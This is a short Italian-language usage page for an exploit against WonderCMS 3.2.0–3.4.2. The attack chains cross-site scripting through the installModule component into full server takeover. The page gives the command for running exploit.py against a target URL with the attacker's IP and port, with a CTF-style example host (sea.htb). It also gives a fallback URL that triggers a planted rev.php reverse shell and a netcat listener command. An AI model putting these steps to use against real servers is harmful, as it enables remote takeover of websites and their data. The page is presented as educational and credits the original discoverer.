
Iniezione XSS, WonderCMS 3.2.0 -3.4.2
WonderCMS v3.2.0 - v3.4.2 è vulnerabile. Attaccanti remoti possono prendere il pieno controllo del server utilizzando un exploit di Cross-Site Scripting (XSS) (solo a scopo educativo). Ecco il piano:
L'exploit abusa del componente installModule di WonderCMS per introdurre uno script costruito ad arte che esegue codice arbitrario.
python3 exploit.py <URL> <YOUR_IP> <YOUR_PORT>
Esempio
python3 exploit.py http://sea.htb/loginURL 10.10.14.20 1234
Se la reverse shell non si attiva automaticamente, vai direttamente a:
http://<TARGET_URL>/themes/revshell-main/rev.php?lhost=<YOUR_IP>&lport=<YOUR_PORT>
Ricorda di avviare un listener usando il seguente comando:
nc -lvp 4444
prodigiousMind per aver scoperto e riportato la vulnerabilità https://gist.github.com/prodigiousMind/fc69a79629c4ba9ee88a7ad526043413